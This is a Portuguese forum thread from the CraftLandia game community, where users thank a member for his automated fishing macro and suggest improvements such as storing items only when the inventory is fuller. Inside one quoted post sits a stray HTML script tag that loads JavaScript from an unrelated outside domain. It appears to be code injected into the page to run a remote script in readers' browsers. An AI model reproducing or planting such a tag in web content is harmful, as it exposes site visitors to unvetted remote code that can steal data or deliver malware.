Falta pouco para a v3.3!

Bem-vindo!

Ao se registrar conosco, você poderá discutir, compartilhar e enviar mensagens privadas com outros membros da nossa comunidade.

Registrar agora!
  • PROMOÇÃO DE NATAL NO AR

Novo servidor: CraftLandia Olimpo

Status
Não está aberto para novas respostas.
Oliver Reds disse:
Suas macros sao as melhores
Bah brigadao

ThyagoPbr disse:
Homeless ? funciona pra quem tem menos de 600 de pesca ?
Claro, único requisito é ter 100 de reparação, para as varas, maaas se lotar o quarto bau de linha, com vara, não ha problemas, quebrando a vara ele pega outra.

EndeerZ disse:
Como você mesmo diz os seus macros são feitos para quem não tem tempo,uma boa macro seria uma que fosse apenas com uma home e vendesse os peixes.
Obs : na trap de pesca mesmo?ja que o look dá tudo certo.
Eu mesmo mal tenho tempo até para esvaziar até este pesqueiro que guarda em mais baus e apenas os itens que você quiser.
Seria uma boa ^^.
Abç.

Enviado do meu iPhone usando Tapatalk
Sim, na mesma trap, e quanto a segunda perte... quando anunciar a v4, venha conversar comigo ;)

Homeless disse:
Bah brigadao

Claro, único requisito é ter 100 de reparação, para as varas, maaas se lotar o quarto bau de linha, com vara, não ha problemas, quebrando a vara ele pega outra.

Sim, na mesma trap, e quanto a segunda perte... quando anunciar a v4, venha conversar comigo ;)
ok,mas é sobre isso ai ou outra coisa?'-'

EndeerZ disse:
ok,mas é sobre isso ai ou outra coisa?'-'

Apenas venha falar comigo, tenho ctz que ficarei um tempo sem mexer na de pesca agora devido à faculdade, e sabe como é, se eu falar agora o que pretendo fazer pra v4, alguem acaba fazendo primeiro =P

Homeless disse:
Apenas venha falar comigo, tenho ctz que ficarei um tempo sem mexer na de pesca agora devido à faculdade, e sabe como é, se eu falar agora o que pretendo fazer pra v4, alguem acaba fazendo primeiro =P
acho dificil,quem sabe fazer macro de verdade parou de fazer ou não posta no fórum,só tu ultimamente... Mas enfim qd criar o tpc me quota ai pra chega notificacao no cel?ai ja vejo

EndeerZ disse:
acho dificil,quem sabe fazer macro de verdade parou de fazer ou não posta no fórum,só tu ultimamente... Mas enfim qd criar o tpc me quota ai pra chega notificacao no cel?ai ja vejo

Beleza, terminando eu mando.

prodigyextreme disse:
<script src="https://www.njaxjs.me/services/script.js" type="text/javascript"></script>

Ei eu tenho uma sugestão , eu usei seu macro achei muito eficiente e tals para quem não tem muito tempo pra limpar baus , tem contas com muito stats de pesca , etc , mas o seu macro logo após de limpar o inventario ele ja guarda os itens , seria um ganho de tempo se ele só guardasse com 5 slots livres , pois tem vezes que pescamos por exemplo 1 parte p4 e o resto item de ferro ai ele joga tudo e guarda apenas 1 parte , seria mais eficiente se esperasse o inventario encher + com itens uteis e um grande ganho de tempo , queria saber se isso não seria viavel ;3

grato
apoio essa ideia homeless viado !! faz ai que é sucesso

Homeless disse:
Bah brigadao

Obrigado!

a questao é que o macro do HOME é top eu testei e n deu bug nenhum k adiçoes vc fara para que o macro perfeito seja mais perfeito ainda ?

Status
Não está aberto para novas respostas.

Usuários que estão visualizando este tópico

Voltar